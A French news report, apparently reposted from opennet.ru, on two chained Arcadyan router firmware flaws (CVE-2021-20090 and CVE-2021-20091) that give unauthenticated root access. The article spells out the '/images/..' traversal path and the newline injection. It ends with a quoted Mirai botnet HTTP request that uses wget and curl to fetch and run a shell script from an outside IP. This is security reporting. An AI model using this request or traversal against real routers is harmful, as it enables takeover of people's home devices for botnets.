Une vulnérabilité dans les routeurs domestiques, touchant 17 fabricants.

Une attaque massive a été détectée sur les routeurs domestiques utilisant une implémentation du serveur http de la société Arcadyan dans leur firmware. Un mélange de deux vulnérabilités est utilisé pour prendre le contrôle des appareils, permettant l'exécution à distance de code arbitraire avec des droits root. Ce problème concerne un large éventail de routeurs ADSL des sociétés Arcadyan, ASUS et Buffalo, ainsi que des appareils fournis sous les marques Beeline (problème confirmé dans le Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone et d'autres opérateurs de télécommunication. Il est noté que le problème existe dans les firmwares d'Arcadyan depuis plus de 10 ans et a déjà été trouvé dans au moins 20 modèles d'appareils provenant de 17 fabricants différents.

La première vulnérabilité CVE-2021-20090 permet d'accéder à n'importe quel script de l'interface web sans passer par l'authentification. Le problème réside dans le fait que certains répertoires de l'interface web, utilisés pour afficher des images, des fichiers CSS et des scripts JavaScript, sont accessibles sans authentification. La vérification des répertoires pour lesquels l'accès sans authentification est autorisé se fait sur la base d'un masque original. L'indication dans les chemins des caractères «..\/» pour revenir au répertoire parent est bloquée par le firmware, mais l'utilisation de la combinaison «..» est laissée passer. Ainsi, il est possible d'accéder à des pages protégées en envoyant des requêtes telles que «http:\/\/192.168.1.1\/images\/..index.htm».

La seconde vulnérabilité CVE-2021-20091 permet à un utilisateur authentifié de modifier les paramètres système de l'appareil en envoyant des paramètres soigneusement formulés au script apply_abstract.cgi, qui ne vérifie pas la présence de caractères de nouvelle ligne dans les paramètres. Par exemple, un attaquant peut, lors de l'exécution de l'opération ping, spécifier dans le champ avec l'adresse IP à vérifier la valeur «192.168.1.2ARC_SYS_TelnetdEnable=1», et le script écrira dans le fichier de configuration \/tmp\/etc\/config\/.glbcfg la ligne «AARC_SYS_TelnetdEnable=1», qui active serveur telnetd, fournissant un accès illimité à l'interpréteur de commandes avec des droits root. De même, en installant le paramètre AARC_SYS, il est possible d'exécuter n'importe quel code sur le système. La première vulnérabilité permet d'exécuter le script problématique sans authentification, en y accédant comme «\/images\/..apply_abstract.cgi».

Pour exploiter les vulnérabilités, l'attaquant doit être en mesure d'envoyer une requête sur le port réseau où l'interface web est active. À en juger par la dynamique de propagation de l'attaque, de nombreux opérateurs laissent un accès depuis le réseau externe sur leurs appareils pour faciliter le diagnostic des problèmes par le support technique. En restreignant l'accès à l'interface uniquement au réseau interne, une attaque peut être menée depuis l'extérieur par le biais de la technique du « DNS rebinding ». Les vulnérabilités sont déjà activement utilisées pour connecter des routeurs au botnet Mirai : POST /images/..apply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time5&ARC_ping_ipaddress=212.192.241.7 ARC_SYS_TelnetdEnable=1& ARC_SYS_=cd+\/tmp; wget+http:\/\/212.192.241.72\/lolol.sh; curl+-O+http:\/\/212.192.241.72\/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

Source : opennet.ru

Acheter un hébergement fiable pour les sites avec protection DDoS, serveurs VPS VDS 🔥 Acheter un hébergement fiable pour les sites avec protection DDoS, serveurs VPS VDS | ProHoster